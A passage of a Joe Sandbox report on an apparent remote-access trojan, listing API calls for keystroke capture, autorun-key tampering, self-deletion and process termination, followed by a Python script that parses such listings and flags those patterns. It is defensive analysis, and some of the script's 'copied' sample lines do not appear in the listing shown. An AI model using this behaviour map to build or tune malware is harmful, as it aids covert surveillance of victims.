                                                          • Instruction ID: 4c389cf0edc94a27bb3bc0fddc987b72c0da48b50f0a0a77cbfc03dd010ffeca
                                                          • Opcode Fuzzy Hash: 013d8eb75564844e77d0a130007ea633e5b9443d2c6b05f924e9c22f592720ae
                                                          • Instruction Fuzzy Hash: 9AE09B2134032117C898323EA91B6EE3A218F82F65B80016FF8427BADADD7D4D5043CF
                                                          APIs
                                                          • _free.LIBCMT ref: 00448A35
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapLast_free
                                                          • String ID: 8@$8@
                                                          • API String ID: 1353095263-3408345419
                                                          • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                          • Instruction ID: 8fe4af4b93ebf6b2b13329648f525de20a5552277f2be9521e73d3219e6c2dc0
                                                          • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                          • Instruction Fuzzy Hash: 01E092361003059F8720CF6DD400A86B7F4EF95720720852FE89EE3710D731E812CB40
                                                          APIs
                                                          • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State
                                                          • String ID: [CtrlL]$[CtrlR]
                                                          • API String ID: 1649606143-2446555240
                                                          • Opcode ID: 4cd3fd2045822c407c10e6f4791885f4ed8356674f4e2c80592f01f7e92f4c5a
                                                          • Instruction ID: c178b64a75e50e2fccb38c9379e001e6e5e0f6b670105b82eaba8ba361dc1658
                                                          • Opcode Fuzzy Hash: 4cd3fd2045822c407c10e6f4791885f4ed8356674f4e2c80592f01f7e92f4c5a
                                                          • Instruction Fuzzy Hash: 59E0866170031517C514363DD61B67F39128F41B66F80012FF842A7AC6ED7E8D6423CB
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004752F0,00475308,?,pth_unenc), ref: 00412A60
                                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412A70
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412A5E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 2654517830-1051519024
                                                          • Opcode ID: 3a238ae8f5602ce2402de7cae663a0db3b4178bc362611f3100633d001d48757
                                                          • Instruction ID: 27182704b7fa20b5ed2a2764b3d23dc9a6b68b829b0f6622ee10c7d45645f89b
                                                          • Opcode Fuzzy Hash: 3a238ae8f5602ce2402de7cae663a0db3b4178bc362611f3100633d001d48757
                                                          • Instruction Fuzzy Hash: F1E01270200308BAEF204FA19E06FEB37ACAB40BC9F004169F601F5191EAB6DD54A658
                                                          APIs
                                                            • Part of subcall function 00448973: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046ECB8,00000010,0043AF25), ref: 004489D5
                                                            • Part of subcall function 00448973: _free.LIBCMT ref: 004489E3
                                                            • Part of subcall function 00448A13: _free.LIBCMT ref: 00448A35
                                                          • DeleteCriticalSection.KERNEL32(00645110), ref: 0043AF41
                                                          • _free.LIBCMT ref: 0043AF55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$CriticalDeleteSection
                                                          • String ID: 0Qd
                                                          • API String ID: 1906768660-844494294
                                                          • Opcode ID: 71ff8b17d51679f1d22a336c43bf2a586848bbcdcff3b0266824fadac5e6ad26
                                                          • Instruction ID: c565f5be962e97e7d95751f2e11d368bfb34a8db459f84b373f63e28eeb95a6a
                                                          • Opcode Fuzzy Hash: 71ff8b17d51679f1d22a336c43bf2a586848bbcdcff3b0266824fadac5e6ad26
                                                          • Instruction Fuzzy Hash: 31E0D83280461087D6247F7DFD4195D73A4EB4D725F02042EF859B3161CE6C6CC1674D
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteDirectoryFileRemove
                                                          • String ID: pth_unenc
                                                          • API String ID: 3325800564-4028850238
                                                          • Opcode ID: 7b845410b2c100cd84e1cb5c796077768945eb3f9586e929b361309ded2c1d61
                                                          • Instruction ID: b030a41f26c3d5f2e51690188d4bb45887e11e7cc62b1c698fc8f7347c957287
                                                          • Opcode Fuzzy Hash: 7b845410b2c100cd84e1cb5c796077768945eb3f9586e929b361309ded2c1d61
                                                          • Instruction Fuzzy Hash: 12E046715116104BC610AB32E845AEBB798AB05306F00446FE8D3B36A1DE38A948CA98
                                                          APIs
                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ObjectProcessSingleTerminateWait
                                                          • String ID: pth_unenc
                                                          • API String ID: 1872346434-4028850238
                                                          • Opcode ID: 5bb4d910bf534706ca5f2b5d32154bdbdc32722f36a2c9cc9993c004b7262cc3
                                                          • Instruction ID: eef26e02e81300ba4c8cf7f61278c3f59c29627b67378ac59a4e73c1cb1fd9d7
                                                          • Opcode Fuzzy Hash: 5bb4d910bf534706ca5f2b5d32154bdbdc32722f36a2c9cc9993c004b7262cc3
                                                          • Instruction Fuzzy Hash: 24D01234145351AFD7610B60AD19F953F68E705323F108365F428512F1CFB58494AA1C
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FD37
                                                          • GetLastError.KERNEL32 ref: 0043FD45
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FDA0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                          • String ID:
                                                          • API String ID: 1717984340-0
                                                          • Opcode ID: da5cee2afb3fc4b5b183086853f31dabd9e5fae04dd03cb90eeff65bb8952867
                                                          • Instruction ID: a8021b2984f9c2011c4d4eba480f75da6e6c35d7fa760b83b06315d7a0ea6bca
                                                          • Opcode Fuzzy Hash: da5cee2afb3fc4b5b183086853f31dabd9e5fae04dd03cb90eeff65bb8952867
                                                          • Instruction Fuzzy Hash: E1410A30E00246AFCF218F65C84867B7BA5EF09310F14517EFC5A9B2A2DB398D05C759
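The API listings above are easier to triage once their raw hex arguments are decoded: GetKeyState(00000011) is VK_CONTROL, GetKeyState(00000012) is VK_MENU (Alt), GetKeyState(00000010) inside the ToUnicodeEx subcall is VK_SHIFT, and the 80000002 handed to RegOpenKeyExW is HKEY_LOCAL_MACHINE with samDesired 00000002 (KEY_SET_VALUE) before RegDeleteValueW. The following Python script is an added example, not part of the Joe Sandbox report: it parses the report's "APIs" bullet lines into structured calls, decodes those Win32 constants, and applies a few behavioural rules drawn only from the blocks shown here (Policies\Explorer\Run registry access, DeleteFileW followed by RemoveDirectoryW, GetKeyState together with ToUnicodeEx). The sample lines are copied from the listing above; the rule names and the ApiCall structure are my own.

```python
import re
from dataclasses import dataclass
from typing import Optional

# One Joe Sandbox "APIs" bullet, e.g.
#   • GetKeyState.USER32(00000011), ref: 0040AD5B
#   • Part of subcall function 00409B10: ToUnicodeEx.USER32(...), ref: 00409B8A
#   • _free.LIBCMT ref: 00448A35            (no argument list at all)
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Win32 constants seen in this section (documented Windows values).
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}
HKEY_NAMES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
AUTORUN_POLICY_KEY = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"


@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # int for 8-digit hex literals, None for '?', str otherwise
    ref: int              # address of the call site
    caller: Optional[int] = None  # address of the subcall function, if nested

    @property
    def strings(self):
        return [a for a in self.args if isinstance(a, str)]


def parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok


def parse_api_line(line):
    """Return an ApiCall for a report bullet, or None for any other line."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    caller = int(m["caller"], 16) if m["caller"] else None
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16), caller)


def describe(call):
    """Render a call with the constants an analyst would otherwise look up."""
    if call.api == "GetKeyState" and call.args and isinstance(call.args[0], int):
        return f"GetKeyState({VK_NAMES.get(call.args[0], hex(call.args[0]))})"
    if call.api.startswith("RegOpenKeyEx") and len(call.args) >= 2 and isinstance(call.args[0], int):
        hive = HKEY_NAMES.get(call.args[0], hex(call.args[0]))
        return f"RegOpenKeyExW({hive}\\{call.args[1]})"
    return call.api


def flag_block(calls):
    """Behavioural rules grounded in the API combinations listed in this report."""
    names = {c.api for c in calls}
    flags = []
    if any(c.api.startswith("Reg") and any(AUTORUN_POLICY_KEY in s for s in c.strings) for c in calls):
        flags.append("touches Policies\\Explorer\\Run autorun key")
    if {"DeleteFileW", "RemoveDirectoryW"} <= names:
        flags.append("deletes a file then its directory (self-removal pattern)")
    if "GetKeyState" in names and "ToUnicodeEx" in names:
        flags.append("translates keystrokes with layout/modifier state (keylogger pattern)")
    if {"TerminateProcess", "WaitForSingleObject"} <= names:
        flags.append("kills a process and waits for it to exit")
    return flags


def analyse(lines):
    calls = [c for c in map(parse_api_line, lines) if c is not None]
    return calls, flag_block(calls)


# Constructed input: bullets copied from the function blocks in this section.
SAMPLE_BLOCKS = {
    "keylog": [
        "• GetKeyState.USER32(00000011), ref: 0040AD5B",
        "• Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52",
        "• Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C",
        "• Part of subcall function 00409B10: ToUnicodeEx.USER32(0047515C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A",
    ],
    "autorun": [
        r"• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004752F0,00475308,?,pth_unenc), ref: 00412A60",
        "• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412A70",
    ],
    "selfdelete": [
        "• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84",
        "• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF",
    ],
    "crt": [
        "• _free.LIBCMT ref: 00448A35",
        "• GetLastError.KERNEL32 ref: 0043FD45",
    ],
}

if __name__ == "__main__":
    for name, lines in SAMPLE_BLOCKS.items():
        calls, flags = analyse(lines)
        print(name, [describe(c) for c in calls], flags)
```

Run as-is it prints each block's decoded calls and the rules that fired; feed it the "APIs" section of a report to get the same summary for every function block. Subcall bullets keep their caller address so a hit can be traced back to the function that actually issued the call.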